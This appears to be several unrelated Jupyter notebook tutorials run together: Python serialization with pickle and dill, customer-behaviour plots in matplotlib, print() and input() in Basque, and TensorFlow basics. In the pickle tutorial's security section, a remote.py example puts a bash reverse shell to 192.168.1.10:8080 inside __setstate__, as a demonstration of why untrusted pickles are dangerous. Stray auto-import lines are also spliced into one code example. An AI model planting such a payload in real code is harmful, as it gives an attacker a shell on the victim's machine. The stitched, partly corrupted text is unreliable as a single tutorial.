objects:1. The [`marshal`](https://docs.python.org/3/library/marshal.html) module2. The [`json`](https://docs.python.org/3/library/json.html) module3. The [`pickle`](https://docs.python.org/3/library/pickle.html) module In addition, Python supports [`XML`](https://www.xml.com/axml/axml.html), which you can also use to serialize objects. The `marshal` module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the `.pyc` files you get when the interpreter imports a Python module. So, even though you can use `marshal` to serialize some of your objects, it’s not recommended. The `json` module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange. There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the `json` module, you can serialize and deserialize several standard Python types:- `bool`- `dict`- `int`- `float`- `list`- `string`- `tuple`- `None` The Python `pickle` module is another way to serialize and deserialize objects in Python. It differs from the `json` module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects. **Note:** From now on, you’ll see the terms **pickling** and **unpickling** used to refer to serializing and deserializing with the Python `pickle` module. So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case. Here are three general guidelines for deciding which approach to use:1. Don’t use the `marshal` module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.2. The `json` module and XML are good choices if you need interoperability with different languages or a human-readable format.3. The Python `pickle` module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with `pickle`. Inside the Python pickle Module The Python pickle module basically consists of four methods:```pythonpickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)``` The first two methods are used during the pickling process, and the other two are used during unpickling. The only difference between `dump()` and `dumps()` is that the first creates a file containing the serialization result, whereas the second returns a string. To differentiate `dumps()` from `dump()`, it’s helpful to remember that **the `s` at the end of the function name stands for `string`**. The same concept also applies to `load()` and `loads()`: The first one reads a file to start the unpickling process, and the second one operates on a string. Consider the following example. Say you have a custom-defined class named `example_class` with several different attributes, each of a different type:- `a_number`- `a_string`- `a_dictionary`- `a_list`- `a_tuple` The example below shows how you can instantiate the class and pickle the instance to get a plain string. After pickling the class, you can change the value of its attributes without affecting the pickled string. You can then unpickle the pickled string in another variable, restoring an exact copy of the previously pickled class: ###Code # pickling.py import pickle class example_class: a_number = 35 a_string = "hey" a_list = [1, 2, 3] a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]} a_tuple = (22, 23) my_object = example_class() my_pickled_object = pickle.dumps(my_object) # Pickling the object print(f"This is my pickled object:\n{my_pickled_object}\n") my_object.a_dict = None my_unpickled_object = pickle.loads(my_pickled_object) # Unpickling the object print(f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n") ###Output This is my pickled object: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.' This is a_dict of the unpickled object: {'first': 'a', 'second': 2, 'third': [1, 2, 3]} ###Markdown In the example above, you create several different objects and serialize them with `pickle`. This produces a single string with the serialized result. The pickling process ends correctly, storing your entire instance in this string: `b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'`. After the pickling process ends, you modify your original object by setting the attribute `a_dict` to `None.Finally, you unpickle the string to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began. Protocol Formats of the Python pickle Module As mentioned above, the `pickle` module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the `pickle` module has evolved over time. This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process. There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling. - **Protocol version 0** was the first version. Unlike later protocols, it’s human readable.- **Protocol version 1** was the first binary format.- **Protocol version 2** was introduced in Python 2.3.- **Protocol version 3** was added in Python 3.0. It can’t be unpickled by Python 2.x.- **Protocol version 4** was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.- **Protocol version 5** was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data. Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.To identify the highest protocol that your interpreter supports, you can check the value of the `pickle.HIGHEST_PROTOCOL` attribute. ###Code pickle.HIGHEST_PROTOCOL ###Output _____no_output_____ ###Markdown To choose a specific protocol, you need to specify the protocol version when you invoke `load()`, `loads()`, `dump()` or `dumps()`. If you don’t specify a protocol, then your interpreter will use the default version specified in the `pickle.DEFAULT_PROTOCOL` attribute. Picklable and Unpicklable Types You’ve already learned that the Python `pickle` module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as `dill`. The `dill` module extends the capabilities of `pickle`. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others. The `dill` module extends the capabilities of `pickle`. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others. To test this module, you can try to pickle a `lambda` function.If you try to run this program, then you will get an exception because the Python `pickle` module can’t serialize a `lambda` function: ###Code # pickling_error.py import pickle square = lambda x : x * x my_pickle = pickle.dumps(square) ###Output _____no_output_____ ###Markdown Now try replacing the Python `pickle` module with `dill` to see if there’s any difference.If you run this code, then you’ll see that the `dill` module serializes the `lambda` without returning an error: ###Code # pickling_dill.py import dill square = lambda x: x * x my_pickle = dill.dumps(square) print(my_pickle) ###Output b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_create_code\nq\x01(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x02N\x85q\x03)X\x01\x00\x00\x00xq\x04\x85q\x05X\x1f\x00\x00\x00<ipython-input-17-fd95d6aa4b4e>q\x06X\x08\x00\x00\x00<lambda>q\x07K\x04C\x00q\x08))tq\tRq\nc__builtin__\n__main__\nh\x07NN}q\x0bNtq\x0cRq\r.' ###Markdown **Note:** Before you use `dill` instead of pickle, keep in mind that `dill` is not included in the standard library of the Python interpreter and is typically slower than `pickle`. Another interesting feature of `dill` is that it can even serialize an entire interpreter session. Here’s an example: ###Code >>> square = lambda x : x * x >>> a = square(35) >>> import math >>> b = math.sqrt(484) >>> import dill >>> dill.dump_session('test.pkl') ###Output _____no_output_____ ###Markdown In this example, you start the interpreter, import a module, and define a `lambda` function along with a couple of other variables. You then import the `dill` module and `invoke dump_session()` to serialize the entire session. If everything goes okay, then you should get a `test.pkl` file in your current directory: Now you can start a new instance of the interpreter and load the `test.pkl` file to restore your last session: ###Code >>> globals().items() >>> import dill >>> dill.load_session('test.pkl') >>> globals().items() >>> a >>> b >>> square ###Output _____no_output_____ ###Markdown The first `globals().items()` statement demonstrates that the interpreter is in the initial state. This means that you need to import the `dill` module and call `load_session()` to restore your serialized interpreter session. Even though `dill` lets you serialize a wider range of objects than `pickle`, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for `dill`. So, how can you solve this problem? The solution in this case is to exclude the object from the serialization process and to **reinitialize** the connection after the object is deserialized. In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with `__getstate()__`: ###Code # custom_pickling.py import pickle class foobar: def __init__(self): self.a = 35 self.b = "test" self.c = lambda x: x * x def __getstate__(self): attributes = self.__dict__.copy() del attributes['c'] return attributes import pandas as pd import numpy as np # ^^^ pyforest auto-imports - don't write above this line import pickle import json my_foobar_instance = foobar() my_pickle_string = pickle.dumps(my_foobar_instance) my_new_instance = pickle.loads(my_pickle_string) print(my_new_instance.__dict__) ###Output {'a': 35, 'b': 'test'} ###Markdown In this example, you create an object with three attributes. Since one attribute is a `lambda`, the object is unpicklable with the standard `pickle` module. To address this issue, you specify what to pickle with `__getstate__()`. You first clone the entire `__dict__` of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable `c` attribute. If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the `c` attribute. But what if you wanted to do some additional initializations while unpickling, say by adding the excluded `c` object back to the deserialized instance? You can accomplish this with `__setstate__()`. ###Code # custom_unpickling.py import pickle class foobar: def __init__(self): self.a = 35 self.b = "test" self.c = lambda x: x * x def __getstate__(self): attributes = self.__dict__.copy() del attributes['c'] return attributes def __setstate__(self, state): self.__dict__ = state self.c = lambda x: x * x my_foobar_instance = foobar() my_pickle_string = pickle.dumps(my_foobar_instance) my_new_instance = pickle.loads(my_pickle_string) print(my_new_instance.__dict__) ###Output {'a': 35, 'b': 'test', 'c': <function foobar.__setstate__.<locals>.<lambda> at 0x7f2704f81a70>} ###Markdown By passing the excluded `c` object to `__setstate__()`, you ensure that it appears in the `__dict__` of the unpickled string. Compression of Pickled Objects Although the `pickle` data format is a compact binary representation of an object structure, you can still optimize your pickled string by compressing it with `bzip2` or `gzip`. To compress a pickled string with `bzip2`, you can use the `bz2` module provided in the standard library. In the following example, you’ll take a string, pickle it, and then compress it using the `bz2` library: ###Code >>> import pickle >>> import bz2 >>> my_string = """Per me si va ne la città dolente, ... per me si va ne l'etterno dolore, ... per me si va tra la perduta gente. ... Giustizia mosse il mio alto fattore: ... fecemi la divina podestate, ... la somma sapienza e 'l primo amore; ... dinanzi a me non fuor cose create ... se non etterne, e io etterno duro. ... Lasciate ogne speranza, voi ch'intrate.""" >>> pickled = pickle.dumps(my_string) >>> compressed = bz2.compress(pickled) >>> len(my_string) 315 >>> len(compressed) 259 ###Output _____no_output_____ ###Markdown When using compression, bear in mind that smaller files come at the cost of a slower process. Security Concerns With the Python pickle Module You now know how to use the `pickle` module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network. However, there’s one more thing you need to know about the Python `pickle` module: It’s not secure. Do you remember the discussion of `__setstate__()`? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process! So, what can you do to reduce this risk? Sadly, not much. The rule of thumb is to **never unpickle data that comes from an untrusted source or is transmitted over an insecure network**. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as `hmac` to sign the data and ensure it hasn’t been tampered with.The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell: ###Code # remote.py import pickle import os class foobar: def __init__(self): pass def __getstate__(self): return self.__dict__ def __setstate__(self, state): # The attack is from 192.168.1.10 # The attacker is listening on port 8080 os.system('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"') pickle.dump(foobar(), open("./bad.pkl", 'wb')) my_foobar = foobar() my_pickle = pickle.dumps(my_foobar) my_unpickle = pickle.loads(my_pickle) ###Output _____no_output_____
tutorials/Visualize_Customer_Behavior.ipynb
###Markdown ContextIn this tutorial, we are using sample data from Unbounce. Unbounce is a subscription-based tool that helps marketers to publish and optimize landing pages for a high conversion rate. For this tutorial, the data includes events and subscription information for 4 accounts. No personal information is included, and account unique identifications have been changed to ensure security. Load DataCustomer behavior data usually includes date and time events, the moments when customers do a particular action. In this tutorial, we will look into events for account republish (`republished_df`) and login (`login_df`). We also have subscription information for each customer (`subscription_info_df`). A customer can have multiple subscriptions, but each subscription is mutually exclusive. A new subscription for a customer only starts when he/she churns (meaning stop paying) then re-subscribe. We call this person a flapper. ###Code republished_df = pd.read_csv("../data/visualize-customer-behavior/republished_sample.csv") login_df = pd.read_csv("../data/visualize-customer-behavior/login_sample.csv") subscription_info_df = pd.read_csv("../data/visualize-customer-behavior/subscription_info.csv") republished_df.head() login_df.head() subscription_info_df.head() ###Output _____no_output_____ ###Markdown Transform DataBefore going into the visualization, we need to transform date columns to date-time format. Right now, Python thinks that they are a bunch of strings. Hence, the dates will not be arranged in a timely order. ###Code republished_df['action_date'] = pd.to_datetime(republished_df['action_date']) login_df['action_date'] = pd.to_datetime(login_df['action_date']) subscription_info_df['subscription_starts_at'] = pd.to_datetime(subscription_info_df['subscription_starts_at']) subscription_info_df['subscription_ends_at'] = pd.to_datetime(subscription_info_df['subscription_ends_at']) sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == 'a'] sample_republished = republished_df[republished_df['AccountCode'] == 'a'] sample_login = login_df[login_df['AccountCode'] == 'a'] # this is a constant for visualization purpose sample_subscription['vizline'] = 0.5 sample_republished['vizline'] = 0.5 sample_login['vizline'] = 0.5 ###Output _____no_output_____ ###Markdown Visualize **TIP 1: Is this account a same-day flapper? Let's mix some colors!** **This tip is handy when we need to visualize different events that only happen once, but they may happen on the same day**.Like any subscription-based company, Unbounce expects flappers -- subscribers who subscribe, churn, then come back at some point in time. There are cases when churn and re-subscription happen on the **same** date. To distinguish same-day flappers, we can use this color mixing trick. *Note: we assume here that each subscription is mutually exclusive to another.*If we visualize `subscription start date` with a different color than `subscription end date` and use some opacity level, we will have a different color for same-day flappers.For example, here I choose **blue** for `subscription start date` and **red** for `subscription end date`, and change opacity level through `alpha = 0.5` (`alpha` ranges from 0 to 1). This results in **magenta** for same-day flappers.You can learn more about basic of color mixing through this article: https://mymodernmet.com/color-mixing-chart/.Here is a list of color codes in Matplotlib: https://matplotlib.org/examples/color/named_colors.html ###Code fig, ax = plt.subplots(figsize=(20, 5)) ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'], marker='|', linewidth = 0.1, markersize=50, mew=2, alpha=0.5, color='royalblue', label='Subscription Starts') no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull() ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'], linewidth = 0.1, marker='|', markersize=50, mew=2, alpha=0.5, color='crimson', label='Subscription Ends') ax.legend(loc='upper left', ncol=2) ax.set_title("Customer Behavior") # Remove y-axis ticks as we don't need it ax.get_yaxis().set_visible(False) ###Output _____no_output_____ ###Markdown From the chart above, we know that this account is a flappers with 4 subscriptions. On the last subscription, he/she is a same-day flapper. The last subscription started when the 3rd one ended, and thus we see magenta instead of blue or red here.Besides colors and alpha, there are more parameters in `axes.plot()` function that you can play around depending on how you want to design your chart, such as type of marker and marker size (we will go into more details for `marker` in the next tip). Read more about these parameters here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.plot.html **TIP 2: What is the frequency and intensity of each action? Let's use different shapes and opacity level****This tip is handy when we need to visualize different events that can happen multiple times on the same day.**Because Unbounce is a tool that helps marketers to publish and optimize their landing pages, we care about republish events. We want to understand:* How often do customers republish their page as compare to login to the tool?* How much/intensively do customers republish each time they login?To help answer these questions, we need to plot login and republish on the same chart. There are 2 problems with this:* Customers can login and republish on the same day* Customers can do these actions many times on the same dayAnd to solve these problems, we can use different shapes (through `marker`) and opacity levels (through `alpha`) in `axes.plot()` function. There are many marker types, but here I use *circles* for logins and *triangles* for republishes. You can find out other types here: https://matplotlib.org/3.1.1/api/markers_api.htmlmodule-matplotlib.markers. ###Code fig, ax = plt.subplots(figsize=(20, 5)) # Plot subscription starts and ends ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'], marker='|', linewidth = 0.1, markersize=50, mew=2, alpha=0.5, color='royalblue', label='Subscription Starts') no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull() ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'], linewidth = 0.1, marker='|', markersize=50, mew=2, alpha=0.5, color='crimson', label='Subscription Ends') # Plot login and republish events ax.plot(sample_login['action_date'], sample_login['vizline'], marker='o', markersize=11, alpha=0.3, color='darkseagreen', linewidth=0.1, label='Login') ax.plot(sample_republished['action_date'], sample_republished['vizline'], marker='^', markersize=8, alpha=0.5, color='teal', linewidth=0.1, label='Republish') ax.legend(loc='upper left', ncol=4) ax.set_title("Customer Behavior") ax.get_yaxis().set_visible(False) ###Output _____no_output_____ ###Markdown From the chart above, we can answer the two behavior questions:* **How often do customers republish their page as compare to login to the tool?** -- During the first subscription, this customer logged in and republished almost every 2 weeks, but this frequency has reduced in following subscriptions. There are times that they logged in without republishing a page.* **How often do customers republish their page as compare to login to the tool?** -- During all subscriptions, this account tends to republish many times when they logged in, hence we see darker-colored triangles. This suggests that they may republish every time they make changes to preview the page. TIP 3: How is this account behavior compared to another's? Let's make sure we look at the same scale**This tip is especially handy when you want to compare one entity to another.**If we only look into one customer, we don't know whether this customer is a highly-engaged one, or whether this is a norm for all of our customer base. Although there are other statistical methods to check on customer behavior trends (especially when you have more customers than you can manually check), we can start by visualizing the behavior of different customers and compare them together. I like this method as an exploratory analysis. Because besides talking to customer-facing teams, this helps suggest hypotheses to confirm/deny with statistical models later on.To make a more reasonable comparison, we want to make sure charts use the same scale. There can be customers who start their subscriptions early in the year, while some others start mid-year or end of the year. In this case, I want to limit my chart to show a date range from January 1st to December 31st. We can use `axes.set_xlim()` function for this.Read more about `axes.set_xlim()` here: https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.axes.Axes.set_xlim.html ###Code fig, ax = plt.subplots(figsize=(20, 5)) # Plot subscription starts and ends ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'], marker='|', linewidth = 0.1, markersize=50, mew=2, alpha=0.5, color='royalblue', label='Subscription Starts') no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull() ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'], linewidth = 0.1, marker='|', markersize=50, mew=2, alpha=0.5, color='crimson', label='Subscription Ends') # Plot login and republish events ax.plot(sample_login['action_date'], sample_login['vizline'], marker='o', markersize=11, alpha=0.3, color='darkseagreen', linewidth=0.1, label='Login') ax.plot(sample_republished['action_date'], sample_republished['vizline'], marker='^', markersize=8, alpha=0.5, color='teal', linewidth=0.1, label='Republish') # Limit date range datemin = pd.to_datetime('2019/01/01').date() datemax = pd.to_datetime('2019/12/31').date() ax.set_xlim(datemin, datemax) # Format date date_form = mdates.DateFormatter("%Y/%m/%d") ax.xaxis.set_major_formatter(date_form) # Ensure ticks fall once every other week (interval=2) ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2)) ax.xaxis.set_tick_params(rotation=40) ax.legend(loc='upper left', ncol=4) ax.set_title("Customer Behavior") ax.get_yaxis().set_visible(False) ###Output _____no_output_____ ###Markdown TIP 4: Make it reproducibleI'm a big fan of the rule of three inspired by [David Robinson](http://varianceexplained.org/r/ds-ml-ai/).> When you’ve written the same code 3 times, write a functionSince we're going to visualize the behavior of 4 customers in the dataset (obviously this is more than 3), I want to write a function. I love functions because we can make systematic changes to visualizations and save so much time copy-pasting those changes to each chart. ###Code def _get_sample_data(AccountCode): """This function gets subscription info, login events and republish events for the AccountCode input. Args: AccountCode (str): Account unique identification. Returns: pandas.core.frame.DataFrame: 3 dataframes with subscription info, login and republish events. """ sample_subscription = subscription_info_df[subscription_info_df['AccountCode'] == AccountCode] sample_republished = republished_df[republished_df['AccountCode'] == AccountCode] sample_login = login_df[login_df['AccountCode'] == AccountCode] # this is a constant for visualization purpose sample_subscription['vizline'] = 0.5 sample_republished['vizline'] = 0.5 sample_login['vizline'] = 0.5 return sample_subscription, sample_republished, sample_login def _visualize_customer_behavior(AccountCode): """This function visualizes customer behavior using subscription, login and republish events of a customer. Args: AccountCode (str): Account unique identification. Returns: matplotlib.figure.Figure: a visualization with subscription, login and republish events of a customer. """ sample_subscription, sample_republished, sample_login = _get_sample_data(AccountCode) fig, ax = plt.subplots(figsize=(20, 5)) # Plot subscription starts and ends ax.plot(sample_subscription['subscription_starts_at'], sample_subscription['vizline'], marker='|', linewidth = 0.1, markersize=50, mew=2, alpha=0.5, color='royalblue', label='Subscription Starts') no_expire_mask = ~sample_subscription['subscription_ends_at'].isnull() ax.plot(sample_subscription[no_expire_mask]['subscription_ends_at'], sample_subscription[no_expire_mask]['vizline'], linewidth = 0.1, marker='|', markersize=50, mew=2, alpha=0.5, color='crimson', label='Subscription Ends') # Plot login and republish events ax.plot(sample_login['action_date'], sample_login['vizline'], marker='o', markersize=11, alpha=0.3, color='darkseagreen', linewidth=0.1, label='Login') ax.plot(sample_republished['action_date'], sample_republished['vizline'], marker='^', markersize=8, alpha=0.5, color='teal', linewidth=0.1, label='Republish') # Limit date range datemin = pd.to_datetime('2019/01/01').date() datemax = pd.to_datetime('2019/12/31').date() ax.set_xlim(datemin, datemax) # Show weekly date date_form = mdates.DateFormatter("%Y/%m/%d") ax.xaxis.set_major_formatter(date_form) # Ensure ticks fall once every other week (interval=2) ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=2)) ax.xaxis.set_tick_params(rotation=40) ax.legend(loc='upper left', ncol=4) ax.set_title("Customer Behavior") ax.get_yaxis().set_visible(False) return fig _ = _visualize_customer_behavior('a') _ = _visualize_customer_behavior('b') _ = _visualize_customer_behavior('c') _ = _visualize_customer_behavior('d') ###Output _____no_output_____
KonputaziorakoSarrera-MAT/Gardenkiak/Oinarrizko datu sarrera eta irteera.ipynb
###Markdown Oinarrizko datu sarrera eta irteeraAurreko ataletan ikusi dugunez, `print()` funtzioa pantailatik informazioa erakusteko erabiliko dugu. Atal honetan, sarrera-irteerako oinarrizko beste funtzio bat ere aztertuko dugu, `input()` funtzioa hain zuzen ere (bi funtzio hauek eta aurreko ataletan ikusitako beste guztiak, Python-en [*Built-in Functions*](https://docs.python.org/3/library/functions.html) multzoan definitzen dira). `print()` funtzioaInformazioa testu moduan erakusteko balio duen funtzioa da. Objektu sorta bat jaso eta bakoitzaren balioa testu moduan erakutsiko du: ###Code a = 1 b = 3.4 c = "kaixo" print(a,b,c) ###Output 1 3.4 kaixo ###Markdown `print()` funtzioari ematen dizkiogun objektuak karaktere kate bilakatuko dira `str()` funtzioaren bidez, ondoren testu hoiek pantailatik erakusteko. Funtzioak objektuak jasoko dituela esan badugu ere, funtzioa erabiltzean espresioak erabil ditzakegu (funtzioari emango zaion objektua, espresioaren emaitza izango da): ###Code print(a*4, b>=2, c+"?") ###Output 4 True kaixo? ###Markdown Python-eko funtzioen argumentuek defektuzko balioak izan ditzakete. `print()` funtzioak halako lau argumentu ditu, bere konportamoldea aldatzeko erabil daitezkeenak (ezer adierazi ezean, defektuzko balioa izango dute): ###Code help(print) ###Output Help on built-in function print in module builtins: print(...) print(value, ..., sep=' ', end='\n', file=sys.stdout, flush=False) Prints the values to a stream, or to sys.stdout by default. Optional keyword arguments: file: a file-like object (stream); defaults to the current sys.stdout. sep: string inserted between values, default a space. end: string appended after the last value, default a newline. flush: whether to forcibly flush the stream. ###Markdown * `sep` &rarr; balioen artean gehitutako karattere katea (defektuz, hutsunea). * `end` &rarr; amaieran gehitutako karaktere katea (defektuz, lerro berri bat). * `file` &rarr; *non* idatzi (defektuz, irteera estandarra). * `flush` &rarr; *flushin*-a behartu ala ez. `print()` funtzioa bitxia da, argumentu kopuru mugagabea duelako. Hau dela eta `sep`, `end`, `file` edo ta `flush` argumentuei beste balio bat ematea nahi badugu, beren izena erabili beharko dugu (hau beti egin daiteke): ###Code print(a*4, b>=2, c+"?", sep=" <--> ", end="\nTHE END\n") ###Output 4 <--> True <--> kaixo? THE END ###Markdown Argumentuen izena jartzeak edozein ordenetan adierazteko aukera ere ematen digu: ###Code print(a*4, b>=2, c+"?", end="\nTHE END\n", sep=" <--> ") ###Output 4 <--> True <--> kaixo? THE END ###Markdown Izen bidez adierazitako argumentuei *keyword* argumentu deritzo, eta beti amaieran azaldu behar dira: ###Code print(end="\nTHE END\n", sep=" <--> ", a*4, b>=2, c+"?") ###Output _____no_output_____ ###Markdown `input()` funtzioa`input()` funtzioak sistemaren sarrera estandarra erabiliko du, erabiltzailearengandik informazioa jaso ahal izateko teklatuaren bidez. Funtzoio honek exekuzioa geldiarazten du, erabiltzaileak *return* tekla sakatu arte. Orduan, erabiltzaileak idatzitako testua bueltatuko du ###Code a = input() print("Ados,",a,"idatzi duzu") ###Output 12345 Ados, 12345 idatzi duzu ###Markdown `input()` funtzioak defektuzko `''` balioa duen `prompt` argumentua du: ###Code help(input) ###Output Help on method raw_input in module ipykernel.kernelbase: raw_input(prompt='') method of ipykernel.ipkernel.IPythonKernel instance Forward raw_input to frontends Raises ------ StdinNotImplentedError if active frontend doesn't support stdin. ###Markdown * `prompt` &rarr; pantailatik erakutsiko den mezua (defektuz, hutsa).Argumentu honekin, erabiltzaileari jakinaraziko diogu bere zain gaudela: ###Code a = input("Idatzi balio bat: ") print("Ados,",a,"idatzi duzu") ###Output Idatzi balio bat: 12345 Ados, 12345 idatzi duzu ###Markdown Beti kontutan izan beharreko bi gauza: 1. `input()` funtzioak bueltatzen duenarekin **ZERBAIT** egin behar da (**gorde**, adibidez). 1. `input()` funtzioak **KARAKTERE KATE** bat bueltatzen du (**ez da zenbaki bat**). ###Code a = input("Idatzi balio bat: ") print("Jasotako", a, "balioa", type(a), "motakoa da") print("a * 2 :" , a*2) a = int(a) print("Orain", a, "balioa", type(a), "motakoa da") print("a * 2 :" , a*2) ###Output Idatzi balio bat: 12345 Jasotako 12345 balioa <class 'str'> motakoa da a * 2 : 1234512345 Orain 12345 balioa <class 'int'> motakoa da a * 2 : 24690
Course_2_Improving_Deep_Neural_Networks/wk3_Tensorflow+Tutorial.ipynb
###Markdown TensorFlow TutorialWelcome to this week's programming assignment. Until now, you've always used numpy to build neural networks. Now we will step you through a deep learning framework that will allow you to build neural networks more easily. Machine learning frameworks like TensorFlow, PaddlePaddle, Torch, Caffe, Keras, and many others can speed up your machine learning development significantly. All of these frameworks also have a lot of documentation, which you should feel free to read. In this assignment, you will learn to do the following in TensorFlow: - Initialize variables- Start your own session- Train algorithms - Implement a Neural NetworkPrograming frameworks can not only shorten your coding time, but sometimes also perform optimizations that speed up your code. 1 - Exploring the Tensorflow LibraryTo start, you will import the library: ###Code import math import numpy as np import h5py import matplotlib.pyplot as plt import tensorflow as tf from tensorflow.python.framework import ops from tf_utils import load_dataset, random_mini_batches, convert_to_one_hot, predict %matplotlib inline np.random.seed(1) ###Output _____no_output_____ ###Markdown Now that you have imported the library, we will walk you through its different applications. You will start with an example, where we compute for you the loss of one training example. $$loss = \mathcal{L}(\hat{y}, y) = (\hat y^{(i)} - y^{(i)})^2 \tag{1}$$ ###Code y_hat = tf.constant(36, name='y_hat') # Define y_hat constant. Set to 36. y = tf.constant(39, name='y') # Define y. Set to 39 loss = tf.Variable((y - y_hat)**2, name='loss') # Create a variable for the loss init = tf.global_variables_initializer() # When init is run later (session.run(init)), # the loss variable will be initialized and ready to be computed with tf.Session() as session: # Create a session and print the output session.run(init) # Initializes the variables print(session.run(loss)) # Prints the loss ###Output 9 ###Markdown Writing and running programs in TensorFlow has the following steps:1. Create Tensors (variables) that are not yet executed/evaluated. 2. Write operations between those Tensors.3. Initialize your Tensors. 4. Create a Session. 5. Run the Session. This will run the operations you'd written above. Therefore, when we created a variable for the loss, we simply defined the loss as a function of other quantities, but did not evaluate its value. To evaluate it, we had to run `init=tf.global_variables_initializer()`. That initialized the loss variable, and in the last line we were finally able to evaluate the value of `loss` and print its value.Now let us look at an easy example. Run the cell below: ###Code a = tf.constant(2) b = tf.constant(10) c = tf.multiply(a,b) print(c) ###Output Tensor("Mul:0", shape=(), dtype=int32) ###Markdown As expected, you will not see 20! You got a tensor saying that the result is a tensor that does not have the shape attribute, and is of type "int32". All you did was put in the 'computation graph', but you have not run this computation yet. In order to actually multiply the two numbers, you will have to create a session and run it. ###Code sess = tf.Session() print(sess.run(c)) ###Output 20 ###Markdown Great! To summarize, **remember to initialize your variables, create a session and run the operations inside the session**. Next, you'll also have to know about placeholders. A placeholder is an object whose value you can specify only later. To specify values for a placeholder, you can pass in values by using a "feed dictionary" (`feed_dict` variable). Below, we created a placeholder for x. This allows us to pass in a number later when we run the session. ###Code # Change the value of x in the feed_dict x = tf.placeholder(tf.int64, name = 'x') print(sess.run(2 * x, feed_dict = {x: 3})) sess.close() ###Output 6 ###Markdown When you first defined `x` you did not have to specify a value for it. A placeholder is simply a variable that you will assign data to only later, when running the session. We say that you **feed data** to these placeholders when running the session. Here's what's happening: When you specify the operations needed for a computation, you are telling TensorFlow how to construct a computation graph. The computation graph can have some placeholders whose values you will specify only later. Finally, when you run the session, you are telling TensorFlow to execute the computation graph. 1.1 - Linear functionLets start this programming exercise by computing the following equation: $Y = WX + b$, where $W$ and $X$ are random matrices and b is a random vector. **Exercise**: Compute $WX + b$ where $W, X$, and $b$ are drawn from a random normal distribution. W is of shape (4, 3), X is (3,1) and b is (4,1). As an example, here is how you would define a constant X that has shape (3,1):```pythonX = tf.constant(np.random.randn(3,1), name = "X")```You might find the following functions helpful: - tf.matmul(..., ...) to do a matrix multiplication- tf.add(..., ...) to do an addition- np.random.randn(...) to initialize randomly ###Code # GRADED FUNCTION: linear_function def linear_function(): """ Implements a linear function: Initializes W to be a random tensor of shape (4,3) Initializes X to be a random tensor of shape (3,1) Initializes b to be a random tensor of shape (4,1) Returns: result -- runs the session for Y = WX + b """ np.random.seed(1) ### START CODE HERE ### (4 lines of code) X = tf.constant(np.random.randn(3,1), name = "X") W = tf.constant(np.random.randn(4,3), name = "W") b = tf.constant(np.random.randn(4,1), name = "b") Y = tf.add(tf.matmul(W, X), b) ### END CODE HERE ### # Create the session using tf.Session() and run it with sess.run(...) on the variable you want to calculate ### START CODE HERE ### sess = tf.Session() result = sess.run(Y) ### END CODE HERE ### # close the session sess.close() return result print( "result = " + str(linear_function())) ###Output result = [[-2.15657382] [ 2.95891446] [-1.08926781] [-0.84538042]] ###Markdown *** Expected Output ***: **result**[[-2.15657382] [ 2.95891446] [-1.08926781] [-0.84538042]] 